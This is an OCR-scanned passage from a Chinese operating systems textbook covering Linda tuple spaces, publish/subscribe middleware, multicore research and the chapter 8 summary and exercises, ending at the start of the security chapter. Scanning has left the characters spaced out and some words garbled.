数 ) 的 元 组 。 如 果 发 现 了 ， 则 将 该 元 组 从 元 组 空间 中 移出 ， 并 且 把 第 三 个 域 的 值 赋予 变量 ;。 这 种 匹配 





图 8-37 三 个 Linda 的 元 组 
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和 移出 操作 是 原子 性 的 ， 所 以 ， 如 果 两 个 进程 同时 执行 in 操作 ， 只 有 其 中 一 个 会 成 功 ， 除 非 存在 两 个 或 
更 多 的 匹配 元 组 。 在 元 组 空间 中 甚至 可 以 有 同一 个 元 组 的 多 个 副本 存在 。 

in 采用 的 匹配 算法 是 很 直接 的 。in 原 语 的 域 ， 称 为 模板 (template), (WSE) 它 与 元 组 空间 中 
的 每 个 元 组 的 同一 个 域 相 比 较 ， 如 果 下 面 的 三 个 条 件 都 符合 ， 那 么 产生 出 一 个 匹配 : 

1) 模板 和 元 组 有 相同 数量 的 域 。 

2) 对 应 域 的 类 型 一 样 。 

3) 模板 中 的 每 个 常数 或 者 变量 均 与 该 元 组 域 相 匹配 。 
形式 参数 ， 由 问号 标识 后 面 跟随 一 个 变量 名 或 类 型 所 给 定 ， 并 不 参与 匹配 (除了 类 型 检查 例外 )， 尽 管 
在 成 功 匹配 之 后 ， 那 些 含 有 一 个 变量 名 称 的 形式 参数 会 被 赋值 。 

如 果 没 有 匹配 的 元 组 存在 ， 调 用 进程 便 被 挂 起 ， 直 到 另 一 个 进程 插入 了 所 需要 的 元 组 为 止 ， 此 时 该 
调用 进程 自动 复活 并 获得 新 的 元 组 。 进 程 阻塞 和 自动 解除 阻塞 意味 着 ， 如 果 一 个 进程 与 输出 一 个 元 组 有 
关 而 另 一 个 进程 与 输入 一 个 元 组 有 关 ， 那 么 谁 在 先是 无 关 紧要 的 。 唯 一 的 差别 是 ， 如 果 in 在 out 之 前 被 调 
用 了 ， 那 么 会 有 少许 的 延 时 存在 ， 直 到 得 到 元 组 为 止 。 

在 某 个 进程 需要 一 个 不 存在 的 元 组 时 ， 阻 塞 该 进程 的 方式 可 以 有 许多 用 途 。 例 如 ， 该 方式 可 以 用 于 
信号 量 的 实现 。 为 了 要 建立 信号 量 S 或 在 信号 量 S 上 执行 一 个 up 操作 ， 进 程 可 以 执行 如 下 操作 


out("semaphore S"); 


要 执行 一 个 down 操 作 ， 可 以 进行 


in("semaphore S"); 


在 元 组 空间 中 ("semaphore S") 元 组 的 数量 决定 了 信和 号 量 S 的 状态 。 如 果 信 和 号 量 不 存在 ， 任 何 要 获得 信 
号 量 的 企图 都 会 被 阻塞 ， 直 到 某 些 其 他 的 进程 提供 一 个 为 止 。 

除了 out 和 in 操作 ，Linda 还 提供 了 原 语 read， 它 和 in 是 一 样 的 ， 不 过 它 不 把 元 组 移出 元 组 空间 。 还 有 
一 个 原 语 eval， 它 的 作用 是 同时 对 元 组 的 参数 进行 计算 ， 计 算 后 的 元 组 会 被 放 进 元 组 空间 中 去 。 可 以 利 
用 这 个 机 制 完 成 一 个 任意 的 运算 。 以 上 内 容 说 明了 怎样 在 Linda 中 创建 并 行 的 进程 。 

2. 发 布 /订阅 

由 于 受到 Linda 的 启发 ， 出 现 了 基于 协作 的 模型 的 一 个 例子 ， 称 作 发 布 / 订 阅 (Oki 等 人 ，1993 ) 。 
它 由 大 量 通 过 广播 网 网 络 互联 的 进程 组 成 。 每 个 进程 可 以 是 一 个 信息 生产 者 、 信 息 消费 者 或 两 者 都 是 。 

当 一 个 信息 生产 者 有 了 一 条 新 的 信息 (例如 ， 一 个 新 的 股票 价格 ) 后 ， 它 就 把 该 信息 作为 一 个 元 组 
在 网 络 上 广播 。 这 种 行为 称 为 发 布 (publishing)。 在 每 个 元 组 中 有 一 个 分 层 的 主题 行 ， 其 中 有 多 个 用 圆 
点 (英文 句号 ) 分 隔 的 域 。 对 特定 信息 感 兴 趣 的 进程 可 以 订阅 (subscribe) 特定 的 专题 ， 这 包括 在 主题 
行 中 使 用 通配符 。 在 同一 台 机 器 上 ， 只 要 通知 一 个 元 组 守护 进程 就 可 以 完成 订阅 工作 ， 该 守护 进程 监测 
已 出 版 的 元 组 并 查找 所 需要 的 专题 。 

发 布 /订阅 的 实现 过 程 如 图 8-38 所 示 。 当 一 个 进程 需要 发 布 一 个 元 组 时 ， 它 在 本 地 局 域 网 上 广播 。 在 每 
台 机 器 上 的 元 组 守护 进程 则 把 所 有 的 已 广播 的 元 组 复制 进入 其 RAM。 然 后 检查 主题 行 看 看 哪些 进程 对 它 感 
兴趣 ， 并 给 每 个 感 兴趣 的 进程 发 送 一 个 该 元 组 的 副本 。 元 组 也 可 以 在 广域网 上 或 Internet 上 进行 广播 ， 这 种 
做 法 可 以 通过 将 每 个 局 域 网 中 的 一 台 机 器 变 作 信息 路 由 器 ， 用 来 收集 所 有 已 发 布 的 元 组 ， 然 后 转送 到 其 他 
的 局 域 网 上 再 次 广播 的 方法 来 实现 。 这 种 转送 方法 也 可 以 进行 得 更 为 聪明 ， 即 只 把 元 组 转送 给 至 少 有 一 个 
需要 该 元 组 的 订阅 者 的 远程 局 域 网 。 不 过 要 做 到 这 一 点 ， 需 要 使 用 信息 路 由 器 交换 有 关 订 阅 者 的 信息 。 

这 里 可 以 实现 各 种 语义 ， 包 括 可 靠 发 送 以 及 保证 发 送 ， 即 使 出 现 崩溃 也 没有 关系 。 在 后 一 种 情形 下 ， 
”有 必要 存储 原 有 的 元 组 供 以 后 需要 时 使 用 。 一 种 存储 的 方法 是 将 一 个 数据 库 系统 和 该 系统 挂钩， 并 让 该 
数据 库 订 阅 所 有 的 元 组 。 这 可 以 通过 把 数据 库 封 装 在 一 个 适配器 中 实现 ， 从 而 允许 一 个 已 有 的 数据 库 以 
发 布 /订阅 模型 工作 。 当 元 组 们 经 过 时 ， 适 配器 就 一 一 抓 取 它们 并 把 它们 放 进 数据 库 中 。 

发 布 /订阅 模型 完全 把 生产 者 和 消费 者 分 隔 开 来 ， 如 同 在 Linda 中 一 样 。 但 是 ， 有 的 时 候 还 是 有 必要 
知道 ， 另 外 还 有 谁 对 某 种 信息 感 兴趣 。 这 种 信息 可 以 用 如 下 的 方法 来 收集 ; 发 布 一 个 元 组 ， 它 只 询问 : 
“ 谁 对 信息 x 有 兴趣 ? ”。 以 元 组 形式 的 响应 会 是 :“ 我 对 x 有 兴趣 。” 
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A 
信息 路 由 器 
图 8-38 发 布 /订阅 的 体系 结构 


8.4 有 关 多 处 理 机 系统 的 研究 

操作 系统 领域 的 其 他 方面 研究 很 少 像 多 核 、 多 处 理 器 和 分 布 式 系统 那样 流行 。 这 个 领域 除了 解决 如 
何 将 操作 系统 的 功能 在 多 个 处 理 核心 上 运行 这 个 最 直接 的 问题 外 ， 还 涉及 同步 、 一 致 性 保证 以 及 如 何 使 
系统 变 得 更 快 更 可 靠 这 样 一 系列 操作 系统 的 研究 问题 。 

一 些 研究 致力 于 重新 设计 一 个 专门 针对 多 核 硬件 的 操作 系统 。 例 如 Corey 操作 系统 解决 了 由 于 多 核 
之 间 共 享 数据 结构 所 带 来 的 性 能 问题 (Boyd-Wickizer 等 人 ，2008)。 通 过 仔细 设计 内 核 数据 结构 来 消除 
数据 间 的 共享 ， 这 样 许多 相关 的 瓶颈 问题 就 消失 了 。 与 之 类 似 的 针对 核 数 目 快速 增长 和 硬件 多 样 化 问题 
的 新 型 操作 系统 还 有 Barrelfish (Baumann 等 人 ，2009)， 它 在 分 布 式 系统 中 使 用 的 通信 模型 是 消息 传播 
模型 而 不 是 共享 内 存 模型 。 此 外 还 有 一 些 操 作 系 统 关 注 可 扩展 性 和 性 能 。Fos (Wentzlaff A, 2010) 
是 一 个 针对 可 扩展 性 所 设计 的 操作 系统 ， 它 可 以 从 很 小 的 规模 (多核 CPU ) 扩展 到 很 大 的 规模 ( 云 )。 
此 外 ，NewtOS (Hruby 等 人 ，2012、2013) 是 一 个 致力 于 可 靠 性 (通过 模块 化 的 设计 和 许多 基于 Minix 
3 的 组 件 ) 和 性 能 (通常 是 模块 化 多 服务 器 系统 的 弱点 ) 的 多 服务 器 操作 系统 。 

针对 多 核 的 研究 工作 中 也 不 全 是 重新 设计 的 系统 。Boyd-Wickizer 等 人 (2010) 在 尝试 研究 和 消除 
将 Linux 扩 展 到 48 核 机 器 时 遇 到 的 瓶颈 。 在 此 过 程 中 他 们 发 现 这 一 类 系统 如 果 仔 细 设 计 ， 也 可 以 达到 很 
好 的 可 扩展 性 。Clements 等 人 (2013) 研究 了 决定 一 个 API 是 否 被 设计 为 可 扩展 的 一 些 基本 准则 。 结 果 
表明 无 论 接口 操作 何 时 进行 通信 ， 都 存在 着 一 个 可 扩展 的 实现 方法 。 有 了 以 上 的 知识 ， 操 作 系 统 的 设计 
者 可 以 实现 更 具 扩 展 性 的 操作 系统 。 

近 些 年 来 很 多 系统 方面 的 研究 关注 如 何 使 大 型 应 用 可 以 在 多 核 和 多 处 理 器 的 环境 下 进行 扩展 。 其 中 
的 一 个 例子 是 Salomie 等 人 (2011) 介绍 了 一 种 可 扩展 的 数据 库 引 擎 。 同 样 ， 他 们 的 解决 方案 也 是 通过 
复制 数据 库 而 不 是 隐藏 硬件 并 行 特性 的 方法 来 达到 可 扩展 性 。 

调试 并 行 应 用 是 一 件 困 难 的 事情 ， 并 且 一 些 竞争 条 件 很 难 重 现 。Viennot 等 人 (2013) 提出 了 一 种 
通过 回访 的 机 制 来 调试 多 核 系 统 软件 的 方法 。Kasikci 等 人 (2012) 提出 了 一 种 不 仅 能 检测 竞争 条 件 而 且 
还 能 分 辨 竞争 条 件 好 坏 的 工具 。 

最 后 还 有 很 多 降低 多 处 理 器 系统 功 耗 的 工作 。Chen 等 人 (2013) 提出 了 利用 电量 容器 来 提供 细 粒 
度 电 量 和 功 耗 管理 的 方法 。 


8.5 小 结 


采用 多 个 CPU 可 以 把 计算 机 系统 建造 得 更 快 更 可 靠 。CPU 的 四 种 组 织 形式 是 多 处 理 器 、 多 计算 机 、 
虚拟 机 和 分 布 式 系统 。 其 中 的 每 一 种 都 有 其 自己 的 特性 和 问题 。 

一 个 多 处 理 器 包括 两 个 或 多 个 CPU， 它 们 共享 一 个 公共 的 RAM， 通 常 这 些 CPU 本 身 由 多 核 组 成 ， 
这 些 核 和 CPU 可 以 通过 总 线 、 交 又 开关 或 一 个 多 级 交换 网 络 互 连 起 来 。 各 种 操作 系统 的 配置 都 是 可 能 的 ， 
包括 给 每 个 CPU 配 一 个 各 自 的 操作 系统 、 配 置 一 个 主 操 作 系 统 而 其 他 是 从 属 的 操作 系统 或 者 是 一 个 对 称 
多 处 理 器 ， 在 每 个 CPU 上 都 可 运行 的 操作 系统 的 一 个 副本 。 在 后 一 种 情形 下 ， 需 要 用 锁 提供 同步 。 当 没 
有 可 用 的 锁 时 ， 一 个 CPU 会 空转 或 者 进行 上 下 文 切换 。 各 种 调度 算法 都 是 可 能 的 ， 包 括 分 时 、 空 间 分 割 


消费 者 守护 进程 


多 处 理 机 系统 


以 及 群 调 度 。 
多 计算 机 也 有 两 个 或 更 多 的 CPU， 但 是 这 些 CPU 有 自己 的 私有 存储 器 。 它 们 没有 任何 公共 的 RAM， 
所 以 全 部 的 通信 通过 消息 传递 完成 。 在 有 些 情 形 下 ， 网 络 接口 板 有 自己 的 CPU， 此 时 在 主 CPU 和 接口 板 
上 的 CPU 之 间 的 通信 必须 仔细 地 组 织 ， 以 避免 竞争 条 件 的 出 现 。 在 多 计算 机 中 的 用 户 级 通信 常常 使 用 远 
程 过 程 调 用 ， 但 也 可 以 使 用 分 布 式 共享 存储 器 。 这 里 进程 的 负载 平衡 是 一 个 问题 ， 有 多 种 算法 用 以 解决 
该 问题 ， 包 括 发 送 者 -驱动 算法 、 接 收 者 -驱动 算法 以 及 竞标 算法 等 。 

分 布 式 系统 是 一 个 松散 耦合 的 系统 ， 其 中 每 个 节点 是 一 台 完 整 的 计算 机 ， 配 有 全 部 的 外 部 设备 以 及 
自己 的 操作 系统 。 这 些 系统 常常 分 布 在 较 大 的 地 理 区 域内 。 在 操作 系统 上 通常 设计 有 中 间 件 ， 从 而 提供 
一 个 统一 的 层次 以 方便 与 应 用 程序 的 交互 。 中 间 件 的 类 型 包括 基于 文档 、 基 于 文件 、 基 于 对 象 以 及 基于 
协调 的 中 间 件 。 有 关 的 一 些 例子 有 World Wide Web、CORBA 以 及 Linda。 
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可 以 把 USENET 新 闻 组 系统 和 SETI@home 项 目 
看 作 分 布 式 系统 吗 ? (SETI@home 使 用 数 百 万 
台 空 闲 的 个 人 计算 机 ， 用 来 分 析 无 线 电 频 谱 数 
据 以 搜寻 地 球 之 外 的 智慧 生物 ) 。 如 果 是 ， 它 们 
属于 图 8-1 中 描述 的 哪些 类 ? 


.如 果 一 个 多 处 理 器 中 的 三 个 CPU 在 同一 时 刻 试 


图 访问 内 存 中 同一 个 字 ， 会 发 生 什么 ? 


.如 果 一 个 CPU 在 每 条 指令 中 都 发 出 一 个 内 存 访 


问 请 求 ， 而 且 计算 机 的 运行 速度 是 200MIPS， 
那么 多 少 个 CPU 会 使 一 个 400MHz 的 总 线 饱 和 ? 
假设 对 内 存 的 访问 需要 一 个 总 线 周 期 。 如 果 在 
该 系统 中 使 用 缓存 技术 ， 且 缓存 命中 率 达到 
90% ， 又 需要 多 少 CPU? 最 后 ， 如 果 要 使 32 个 
CPU 共享 该 总 线 而 且 不 使 其 过 载 ， 需 要 多 高 的 
命中 率 ? 


.在 图 8-5 的 omega 网 络 中 ， 假 设 在 交换 网 络 2A 和 


交换 网 络 3B 之 间 的 连 线 断 了 。 那 么 哪些 节点 之 
间 的 联系 被 切断 了 ? 


.在 图 8-7 的 模型 中 ， 信 号 是 如 何 处 理 的 ? 
. 当 如 图 8-8 所 示 模 型 的 系统 调用 发 生 时 ， 必 须要 


在 陷入 内 核 时 立即 解决 一 个 不 会 在 图 8-7 的 模型 
中 发 生 的 问题 。 这 个 问题 的 本 质 是 什么 ， 应 该 
如 何 解决 ? 


.使 用 纯 read 重 写 图 2-22 中 的 enter_region 代 码 ， 


用 以 减少 由 TSL 指 令 所 引起 的 颠 繁 。 


.多 核 CPU 开 始 在 普通 的 桌面 机 和 笔记 本 电脑 上 


出 现 ， 拥 有 数 十 乃至 数 百 个 核 的 桌面 机 也 为 期 
不 远 了 。 利 用 这 些 计算 能 力 的 一 个 可 能 的 方式 
是 将 标准 的 桌面 应 用 程序 并 行 化 ， 例 如 文字 处 
理 或 者 Web 浏 览 器 ， 另 一 个 可 能 的 方式 是 将 操 
作 系 统 提 供 的 服务 (例如 TCP 操 作 ) 和 常用 的 
库 服务 (例如 安全 http 库 函数 ) 并 行 化 。 你 认为 
哪 一 种 方式 更 有 前 途 ? 为 什么 ? 


9. 


10 


12. 


333 


为 了 避免 竞争 ， 在 SMP 操 作 系统 代 码 段 中 的 临 
界 区 真 的 有 必要 吗 ， 或 者 数据 结构 中 的 互 斥 信 
号 量 也 可 完成 这 项 工作 吗 ? 

.在 多 处 理 器 同步 中 使 用 TSL 指 令 时 ， 如 果 持 有 
锁 的 CPU 和 请 求 锁 的 CPU 都 需要 使 用 这 个 拥有 
互 斥 信号 量 的 高 速 缓冲 块 ， 那 么 这 个 拥有 互 斥 
信号 量 的 高 速 缓冲 块 就 得 在 上 述 两 个 CPU 之 间 
来 回 穿梭 。 为 了 减少 总 线 交 通 的 繁忙 ， 每 隔 50 
个 总 线 周 期 ， 请 求 锁 的 CPU 就 执行 一 条 TSL 指 
令 ， 但 是 持 有 锁 的 CPU 在 两 条 TSL 指 令 之 间 需 
要 频繁 地 引用 该 拥有 互 斥 信号 量 的 高 速 缓冲 
块 。 如 果 一 个 高 速 缓冲 块 中 有 16 个 32 位 字 ， 每 
一 个 字 都 需要 用 一 个 总 线 周 期 传送 ， 而 该 总 线 
的 频率 是 400MHz， 那 么 高 速 缓冲 块 的 来 回 移 
动 会 占用 多 少 总 线 带 宽 ? 

.教材 中 曾经 建议 在 使 用 TSL 轮 询 锁 之 间 使 用 二 
进 制 指数 补偿 算法 。 也 建议 过 在 轮 询 之 间 使 用 
最 大 时 延 。 如 果 没 有 最 大 时 延 ， 该 算法 会 正确 
工作 吗 ? 

假设 在 一 个 多 处 理 器 的 同步 处 理 中 没有 TSL 指 
令 。 相 反 ， 提 供 了 另 一 个 指令 SWP ,该 指令 
可 以 把 一 个 寄存 器 的 内 容 交 换 到 内 存 的 一 个 字 
中 。 这 个 指令 可 以 用 于 多 处 理 器 的 同步 吗 ? 如 
果 可 以 ， 它 应 该 怎样 使 用 ? 如 果 不 行 ， 为 什么 
它 不 行 ? 

.在 本 问题 中 ， 读 者 要 计算 把 一 个 自 旋 锁 放 到 总 


” 线 上 需要 花费 总 线 的 多 少 装 载 时 间 。 假 设 CPU 


执行 每 条 指令 花费 5 纳 秒 。 在 一 条 指令 执行 完 
毕 之 后 ， 不 需要 任何 总 线 周期 ， 例如， 执行 
TSL 指 令 。 每 个 总 线 周 期 比 指令 执行 时 间 长 10 
纳 秒 甚至 更 多 。 如 果 一 个 进程 使 用 TSL 循 环 试 
图 进入 某 个 临界 区 ， 它 要 耗费 多 少 的 总 线 带 
宽 ? 假设 通常 的 高 速 缓冲 处 理 正在 工作 ， 所 以 
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取 一 条 循环 体 中 的 指令 并 不 会 浪费 总 线 周 期 。 

14. 亲 和 调度 减少 了 高 速 缓 冲 的 失效 。 它 也 减少 
TLB 的 失效 吗 ? 对 于 缺 页 异常 呢 ? 

15. 对 于 图 8-16 中 的 每 个 拓扑 结构 ， 互 连 网 络 的 直 
径 是 多 少 ? 请 计算 该 问题 的 所 有 跳 数 (主机 一 
路 由 器 和 路 由 器 -路 由 器 ) 。 

16. 考虑 图 8-16 d 中 的 双 凸 面 拓扑 ， 但 是 扩展 到 
kxk。 该 网 络 的 直径 是 多 少 ? (提示 : 分 别 考 
虑 k 是 奇数 和 偶数 的 情况 。) 

17. 互 联网 络 的 平分 贷款 经 常用 来 测试 网 络 容量 。 
其 计算 方法 是 ， 通 过 移 走 最 小 数量 的 链接 ， 将 
网 络 分 成 两 个 相等 的 部 分 。 然 后 把 被 移 走 链接 
的 容量 加 入 进去 。 如 果 有 很 多 方法 进行 分 割 ， 
那么 最 小 带宽 就 是 其 平分 带宽 。 对 于 有 一 个 
8 x8x8 立 方 体 的 互连网 络 ， 如 果 每 个 链接 的 
带宽 是 1Gb/s， 那 么 其 平分 带宽 是 多 少 ? 

18. 如 果 多 计算 机 系统 中 的 网 络 接口 处 于 用 户 模 
式 ， 那 么 从 源 RAM 到 目的 RAM 只 需要 三 个 副 
本 。 假 设 该 网 络 接口 卡 接 收 或 发 送 一 个 32 位 的 
字 需 要 20ns， 并 且 该 网 络 接口 卡 的 频率 是 
1Gb/s。 如 果 忽 略 掉 复制 的 时 间 ， 那 么 把 一 个 
64 字 节 的 包 从 源 送 到 目的 地 的 延 时 是 多 少 ? 如 
果 考 虑 复制 的 时 间 呢 ?接着 考虑 需要 有 两 次 额 
外 复制 的 情形 ， 即 在 发 送 方 将 数据 复制 到 内 核 
的 时 间 ， 和 在 接收 方 将 数据 从 内 核 中 取出 的 时 
间 。 在 这 种 情形 下 的 延 时 是 多 少 ? 

19. 对 于 三 次 复制 和 五 次 复制 的 情形 ， 重 复 前 一 个 
问题 ， 不 过 这 次 是 计算 带宽 而 不 是 计算 延 时 。 

20. 在 将 数据 从 RAM 传 送 到 网 络 接口 时 ， 可 以 使 
用 钉 住 页 面 的 方法 ， 假 设 钉 住 和 释放 页 面 的 系 
统 调用 要 花费 1 微 秒 时 间 。 使 用 DMA 方法 复制 
速度 是 5 字 节 / 纳 秒 ， 而 使 用 编程 110 方 法 需要 
20 纳 秒 。 一 个 数据 包 应 该 有 多 大 才 值 得 钉 住 页 
面 并 使 用 DMA 方 法 ? 

21. 将 一 个 过 程 从 一 台 机 器 中 取出 并 且 放 到 另 一 台 
机 器 上 称 为 RPC， 但 会 出 现 一 些 问 题 。 在 正文 
中 ， 我 们 指出 了 其 中 四 个 : 指针 、 未 知 数组 大 
小 、 未 知 参数 类 型 以 及 全 局 变量 。 有 一 个 未 讨 
论 的 问题 是 ， 如 果 (远程 ) 过 程 执行 一 个 系统 
调用 会 怎样 。 这 样 做 会 引起 什么 问题 ， 应 该 怎 
样 处 理 ? 

22. 在 DSM 系 统 中 ， 当 出 现 一 个 页 面 故障 时 ， 必 
须 对 所 需要 的 页 面 进行 定位 。 请 列 出 两 种 寻找 
该 页 面 的 可 能 途径 。 

23. 考虑 图 8-24 中 的 处 理 器 分 配 。 假 设 进程 H 从 节点 2 
被 移 到 节点 3 上 。 此 时 的 外 部 信息 流量 是 多 少 ? 
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24. 某 些 多 计算 机 允许 把 运行 着 的 进程 从 一 个 布点 
迁移 到 另 一 个 节点 。 停 止 一 个 进程 ， 冻 结 其 内 
存 映像 ， 然 后 就 把 他 们 转移 到 另 一 个 节点 上 是 
TEW? 请 指出 要 使 所 述 的 方法 能 够 工作 的 两 
个 必须 解决 的 问题 。 

25. 在 以 太 网 上 为 什么 会 有 对 电缆 长 度 的 限制 ? 

26. 在 图 8-27 中 ， 四 台 机 器 上 的 第 三 层 和 第 四 层 标 

记 为 中 间 件 和 应 用 。 在 何 种 角度 上 它们 是 跨 平 

台 一 致 的 ， 而 在 何 种 角度 上 它们 是 跨 平台 有 差 

异 的 ? 

.在 图 8-33 中 列 出 了 六 种 不 同 的 服务 。 对 于 下 面 

的 应 用 ， 哪 一 种 更 适用 ? 

(a) Internet 上 的 视频 点 播 。 

(b) 下 载 一 个 网 页 。 

.DNS 的 名 称 有 一 个 层次 结构 ， 如 sales.general- 

widget.com 或 csuni.edu。 维 护 DNS 数 据 库 的 一 种 

途径 是 使 用 一 个 集中 式 的 数据 库 ， 但 是 实际 上 

并 没有 这 样 做 ， 其 原因 是 每 秒 钟 会 有 太 多 的 请 

求 。 请 提出 一 个 实用 的 维护 DNS 数据 库 的 建议 。 

.在 讨论 浏览 器 如 何 处 理 URL 时 ， 曾 经 说 明 与 端 

口 80 连 接 。 为 什么 ? 
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30. 虚拟 机 迁移 可 能 比 进程 迁移 容易 ， 但 是 迁移 仍 


然 是 困难 的 。 在 虚拟 机 迁移 的 过 程 中 会 产生 哪 

些 问 题 ? 

. 当 浏 览 器 获取 一 个 网 页 时 ， 它 首先 发 起 一 个 

TCP 链 接 以 获得 页 面 上 的 文本 (该 文本 用 

HTML 语 言 写 成 )。 然 后 关闭 链接 并 分 析 该 页 

面 。 如 果 页 面 上 有 图 形 或 图 标 ， 就 发 起 不 同 的 

TCP 链 接 以 获取 它们 。 请 给 出 两 个 可 以 改善 性 

能 的 替代 建议 。 

32. 在 使 用 会 话语 义 时 ， 有 一 项 总 是 成 立 的 ， 即 一 

个 文件 的 修改 对 于 进行 该 修改 的 进程 而 言 是 立 

即 可 见 的 ， 而 对 其 他 机 器 上 的 进程 而 言 是 绝对 

不 可 见 的。 不 过 存在 一 个 问题 ， 即 这 种 修改 对 

同一 台 机 器 上 的 其 他 进程 是 否 应 该 立即 可 见 。 

请 提出 正 反 双方 的 争辩 意见 。 

- 当 有 多 个 进程 需要 访问 数据 时 ， 基 于 对 象 的 访 

问 在 哪些 方面 要 好 于 共享 存储 器 ? 

.在 Linda 的 ip 操作 完成 对 一 个 元 组 的 定位 之 后 ， 

线性 地 查询 整个 元 组 空间 是 非常 低 效率 的 。 请 

设计 一 个 组 织 元 组 空间 的 方式 ， 可 以 在 所 有 的 

in 操作 中 加 快 查询 操作 。 

35. 缓存 区 的 复制 很 花费 时 间 。 写 一 个 C 程 序 找 出 
你 访问 的 系统 中 这 种 复制 花费 了 多 少时 间 。 可 
使 用 clock 或 times 函 数 用 以 确定 在 复制 一 个 大 
数组 时 所 花费 的 时 间 。 请 测试 不 同 大 小 的 数组 ， 
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37. 


多 处 理 机 系统 


以 便 把 复制 时 间 和 系统 开销 时 间 分 开 。 


.编写 可 作为 客户 机 和 服务 器 代码 片段 的 C 函 


数 ， 使 用 RPC 来 调用 标准 printf 函数 ， 并 编写 
一 个 主 程序 来 测试 这 些 函 数 。 客 户 机 和 服务 器 
通过 一 个 可 在 网 络 上 传输 的 数据 结构 实现 通 
信 。 读 者 可 以 对 客户 机 所 能 接收 的 格式 化 字符 
串 长 度 以 及 数字 、 类 型 和 变量 的 大 小 等 方面 设 
置 限制 。 

写 一 个 程序 ， 实 现 82 节 中 描述 的 发 送 方 驱动 和 
接收 方 驱 动 的 负载 平衡 算法 。 这 个 算法 必须 把 
新 创建 的 作业 列表 作为 输入 ， 作 业 的 描述 为 
(creating_processor, start_time, required_ 
CPU _time) ， 其 中 creating_processor 表 示 创 建 作 
业 的 CPU 序号 ，start_time 表 示 创 建 作 业 的 时 间 ， 
required_CPU_time 表 示 完 成 作业 所 需要 的 时 间 
(以 秒 为 单位 )。 当 节点 在 执行 一 个 作业 的 同时 
有 第 二 个 作业 被 创建 ， 则 认为 该 节点 超 负荷 。 
在 重负 载 和 轻 负载 的 情况 下 分 别 打印 算法 发 出 
的 探测 消息 的 数目 。 同 时 ， 也 要 打印 任意 主机 
发 送 和 接收 的 最 大 和 最 小 的 探 针 数 。 为 了 模拟 
负载 ， 要 写 两 个 负载 产生 器 。 第 一 个 产生 器 模 
拟 重 的 负载 ， 产 生 的 负载 为 平均 每 隔 AJL 秒 N 个 
作业 ， 其 中 A 开 是 作业 的 平均 长 度 ，N 是 处 理 器 
个 数 。 作 业 长 度 可 能 有 长 有 短 ， 但 是 平均 作业 
长 度 必 须 是 AIL。 作 业 必 须 随 机 地 创建 (放置 ) 
在 所 有 处 理 器 上 。 第 二 个 产生 器 模拟 轻 的 负载 ， 
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每 AJL 秒 随机 地 产生 (N/3) 个 作业 。 为 这 两 个 
负载 产生 器 调节 其 他 的 参数 设置 ， 看 看 是 如 何 
影响 探测 消息 的 数目 。 

实现 发 布 /订阅 系统 的 最 简单 的 方式 是 通过 一 
个 集中 的 代理 ， 这 个 代理 接收 发 布 的 文章 ， 然 
后 向 合适 的 订阅 者 分 发 这 些 文章 。 写 一 个 多 线 
程 的 应 用 程序 来 模拟 一 个 基于 代理 的 发 布 / 订 
阅 系统 。 发 布 者 和 订阅 者 线程 可 以 通过 (共享 ) 
内 存 与 代理 进行 通信 。 每 个 消息 以 消息 长 度 域 
开头 ， 后 面 紧 跟 着 其 他 字符 。 发 布 者 给 代理 发 
布 的 消息 中 ， 第 一 行 是 用 “.” 隔 开 的 层次 化 
主题 ， 后 面 一 行 或 多 行 是 发 布 的 文章 正文 。 订 
阅 者 给 代理 发 布 的 消息 ， 只 包含 着 一 行 用 “.” 
隔 开 的 层次 化 的 兴趣 行 (interest line) ， 表 示 
他 们 所 感 兴趣 的 文章 。 兴 趣 行 可 能 包含 “*.” 
等 通配符 ， 代 理 必须 返回 匹配 订阅 者 兴趣 的 所 
有 (过 去 的 ) 文章 ， 消 息 中 的 多 篇 文章 通过 
“BEGIN NEW ARTICLE” 来 分 隔 。 订 阅 者 必 
须 打 印 他 接收 到 的 每 条 消息 (如 他 的 兴趣 行 ) 。 
订阅 者 必须 连续 接收 任何 匹配 的 新 发 布 的 文 
章 。 发 布 者 和 订阅 者 线程 可 通过 终端 输入 “P” 
或 “S” 的 方式 自由 创建 (分 别 对 应 发 布 者 和 
订阅 者 ) ， 后 面 紧 跟 的 是 层次 化 的 主题 或 兴趣 
行 。 然 后 发 布 者 需要 输入 文章 ， 在 某 一 行 中 键 
入 “.” 表 示 文 章 结束 。( 这 个 作业 也 可 以 通过 
基于 TCP 的 进程 间 通 信 来 实现 )。 
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许多 公司 持 有 一 些 有 价值 的 并 加 以 严密 保护 的 信息 。 这 些 信息 可 以 是 技术 上 的 〈 如 新 款 芯 片 或 软件 
的 设计 方案 )、 商 业 上 的 (如 针对 竞争 对 手 的 研究 报告 或 营销 计划 )、 财 务 方面 的 (如 股票 分 红 预 案 )、 
法 律 上 的 (如 潜在 并 购 方案 的 法 律 文本 ) 以 及 其 他 可 能 有 价值 的 信息 。 这 些 信息 大 部 分 存储 在 电脑 上 。 
很 多 人 将 他 们 的 纳税 申报 单 和 信用 卡号 码 等 财务 信息 保存 在 个 人 电脑 上 。 情 书 也 越 来 越 多 地 以 电子 信件 
的 方式 出 现 。 电 脑 硬 盘 中 装 满 了 照片 、 视 频 、 电 影 等 重要 数据 。 

随 着 越 来 越 多 的 信息 存放 在 计算 机 系统 中 ， 确 保 信息 安全 就 显得 尤为 重要 。 对 所 有 的 操作 系统 而 
言 ， 保 护 此 类 信息 不 被 未 经 许可 地 滥用 是 应 考虑 的 主要 问题 。 然 而 ， 随 着 计算 机 系统 的 广泛 使 用 (和 随 
之 而 来 的 系统 缺陷 ) ， 保 证 信息 安全 也 变 得 越 来 越 困 难 。 在 本 章 中 ， 我 们 将 考察 操作 系统 上 的 计算 机 安 
全 特性 。 

有 关 操 作 系 统 安全 的 话题 在 过 去 的 几 十 年 里 产生 了 很 大 的 变化 。 直 到 20 世 纪 90 年 代 初 期 ， 几 乎 没 
有 多 少 家 庭 拥有 计算 机 ， 大 多 数 计算 任务 都 是 在 公司 、 大 学 和 其 他 一 些 拥 有 多 用 户 计算 机 (从 大 型 机 
到 微型 计算 机 ) 的 组 织 中 完成 的 。 这 些 机 器 几乎 都 是 相互 隔离 的 ， 没 有 任何 一 台 被 连接 到 网 络 中 。 在 
这 样 的 环境 下 ， 保 证 安全 性 所 要 做 的 全 部 工作 就 集中 在 了 如 何 保证 每 个 用 户 只 能 看 到 自己 的 文件 。 如 
果 Tracy 和 Camille 是 同一 台 计 算 机 的 两 个 注册 用 户 ， 那 么 “安全 性 ”就 是 保证 她 们 谁 都 不 能 读 取 或 修 
改 对 方 的 文件 ， 除 非 这 个 文件 被 设 为 共享 权限 。 已 开发 出 一 些 复杂 的 模型 和 机 制 ， 以 保证 没有 哪个 用 
